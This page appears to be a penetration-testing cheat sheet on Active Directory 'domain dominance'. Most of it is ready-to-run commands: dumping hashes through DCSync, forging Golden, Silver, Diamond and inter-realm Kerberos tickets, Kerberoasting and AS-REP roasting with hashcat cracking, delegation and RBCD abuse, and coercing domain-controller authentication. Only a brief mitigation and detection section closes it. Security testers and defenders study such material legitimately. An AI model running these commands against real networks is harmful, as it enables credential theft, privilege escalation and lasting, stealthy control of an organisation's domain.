Domain Dominance
Domain dominance techniques extract and forge Kerberos tickets, enabling complete control over Active Directory environments with persistent, stealthy access.
Warning
These techniques provide powerful access but can be detected by mature SOCs.
Golden Tickets can persist for years - document and revoke after engagement.
DCSync Attack
DCSync simulates domain controller replication to extract password hashes for any domain account, including krbtgt. Requires Replicating Directory Changes permissions (Domain Admins, Enterprise Admins, or delegated rights).
Mimikatz DCSync
text
# Extract specific user
mimikatz # lsadump::dcsync /domain:corp.local /user:Administrator
# Extract krbtgt for Golden Ticket
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt
# Extract all users
mimikatz # lsadump::dcsync /domain:corp.local /all /csvImpacket secretsdump
bash
# DCSync with credentials
secretsdump.py corp.local/admin:P@ssw0rd@dc01.corp.local -just-dc
# Extract just NTDS (all hashes)
secretsdump.py corp.local/admin:P@ssw0rd@dc01.corp.local -just-dc-ntlm
# Extract specific user
secretsdump.py corp.local/admin:P@ssw0rd@dc01.corp.local -just-dc-user krbtgt
# With Kerberos authentication
secretsdump.py -k -no-pass corp.local/admin@dc01.corp.localSharpKatz
powershell
# DCSync with SharpKatz
SharpKatz.exe --Command dcsync --User corp\krbtgt --Domain corp.local --DomainController dc01.corp.localGolden Ticket
A Golden Ticket is a forged TGT signed with the krbtgt account's hash, providing access to any service as any user. Valid until krbtgt password is reset TWICE.
Information
Golden Tickets can specify any user, including non-existent ones. They bypass
disabled/deleted account checks and can include arbitrary group memberships.
Requirements
powershell
# Information needed for Golden Ticket:
# 1. Domain SID
whoami /user
# or
Get-ADDomain | Select-Object DomainSID
# 2. krbtgt NTLM hash (from DCSync)
# 3. Domain name
# 4. Target username (can be fake)Mimikatz Golden Ticket
text
# Create Golden Ticket
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:ntlm_hash_here /ptt
# With specific groups (Domain Admins = 512)
mimikatz # kerberos::golden /user:FakeAdmin /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:xxx /groups:512,513,518,519,520 /ptt
# Export to file instead of inject
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:xxx /ticket:golden.kirbiImpacket ticketer
bash
# Create Golden Ticket
ticketer.py -nthash <krbtgt_hash> -domain-sid S-1-5-21-xxx -domain corp.local Administrator
# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@dc01.corp.localRubeus Golden Ticket
powershell
# Create and inject Golden Ticket
Rubeus.exe golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:<hash> /ptt
# Create with specific user and groups
Rubeus.exe golden /user:FakeUser /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:<hash> /groups:512 /pttSilver Ticket
Silver Tickets are forged service tickets (TGS) that grant access to specific services without contacting the DC. Requires the service account's NTLM hash.
Common Service SPNs
text
# Common target services
CIFS (SMB) - cifs/server.domain.com - File shares
HTTP - http/server.domain.com - Web services
LDAP - ldap/dc.domain.com - Directory queries
HOST - host/server.domain.com - WMI, scheduled tasks
MSSQL - MSSQLSvc/sql.domain.com - SQL Server
WSMAN - wsman/server.domain.com - WinRM/PowerShell RemotingMimikatz Silver Ticket
text
# CIFS Silver Ticket (file share access)
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:fileserver.corp.local /service:cifs /rc4:<service_account_hash> /ptt
# HOST Silver Ticket (WMI, Task Scheduler)
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:server.corp.local /service:host /rc4:<hash> /ptt
# LDAP Silver Ticket (DCSync without DA)
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:dc01.corp.local /service:ldap /rc4:<dc_machine_hash> /pttImpacket Silver Ticket
bash
# Create Silver Ticket for CIFS
ticketer.py -nthash <service_hash> -domain-sid S-1-5-21-xxx -domain corp.local -spn cifs/fileserver.corp.local Administrator
# Use the ticket
export KRB5CCNAME=Administrator.ccache
smbclient.py -k -no-pass corp.local/Administrator@fileserver.corp.localDiamond Ticket
Diamond Tickets modify legitimate TGTs rather than forging from scratch, making them harder to detect. Requires krbtgt hash like Golden Tickets.
powershell
# Rubeus Diamond Ticket
# Request legitimate TGT, then modify it
Rubeus.exe diamond /krbkey:<krbtgt_aes256> /user:Administrator /domain:corp.local /dc:dc01.corp.local /ticketuser:LegitUser /ticketuserid:1234 /groups:512 /pttKerberos Attacks Reference
AS-REP Roasting
bash
# Find accounts with "Do not require Kerberos preauthentication"
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}
# Impacket
GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
# Crack with hashcat
hashcat -m 18200 asrep.txt wordlist.txtKerberoasting
bash
# Find service accounts with SPNs
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
# Impacket
GetUserSPNs.py corp.local/user:password -request -outputfile kerberoast.txt
# Rubeus
Rubeus.exe kerberoast /outfile:kerberoast.txt
# Crack with hashcat
hashcat -m 13100 kerberoast.txt wordlist.txtUnconstrained Delegation
powershell
# Find computers with unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true}
# Monitor for incoming TGTs (on compromised server)
Rubeus.exe monitor /interval:5 /filteruser:DC01$
# Force authentication with PrinterBug/PetitPotam
SpoolSample.exe dc01.corp.local attackserver.corp.local
# Extract and use the TGT
Rubeus.exe ptt /ticket:<base64_ticket>Constrained Delegation (S4U)
powershell
# Find constrained delegation
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
# Rubeus S4U attack
Rubeus.exe s4u /user:svc_sql /rc4:<hash> /impersonateuser:Administrator /msdsspn:cifs/fileserver.corp.local /ptt
# Impacket
getST.py -spn cifs/fileserver.corp.local -impersonate Administrator corp.local/svc_sql:passwordResource-Based Constrained Delegation (RBCD)
bash
# Requirements: Write access to target computer's msDS-AllowedToActOnBehalfOfOtherIdentity
# Create computer account (if MachineAccountQuota > 0)
Impacket: addcomputer.py -computer-name 'EVIL$' -computer-pass 'P@ssw0rd' corp.local/user:pass
# Set RBCD on target
rbcd.py -delegate-to 'TARGET$' -delegate-from 'EVIL$' -action write corp.local/user:pass
# Get service ticket as any user
getST.py -spn cifs/target.corp.local -impersonate Administrator corp.local/'EVIL$':'P@ssw0rd'
# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@target.corp.localCross-Domain Attacks
Inter-Realm Golden Ticket (Trust Abuse)
text
# Get trust key (from DCSync)
mimikatz # lsadump::dcsync /domain:child.corp.local /user:corp$
# Create inter-realm TGT
mimikatz # kerberos::golden /user:Administrator /domain:child.corp.local /sid:S-1-5-21-CHILD /krbtgt:<trust_key> /sids:S-1-5-21-PARENT-519 /ptt
# Enterprise Admins SID from parent: S-1-5-21-PARENT-519
# This grants Enterprise Admin in parent domainMitigation & Detection
text
# Reset krbtgt password (invalidates Golden Tickets)
# Must be reset TWICE (password history = 1)
# Wait for replication between resets
# Detect Golden Tickets:
# - TGT lifetime > domain policy
# - Missing PAC
# - Inconsistent user attributes
# Detect Silver Tickets:
# - Service ticket without TGT request
# - Tickets with suspicious encryption types
# Key Event IDs:
# 4768 - TGT requested (Kerberos AS)
# 4769 - Service ticket requested (Kerberos TGS)
# 4771 - Kerberos pre-auth failed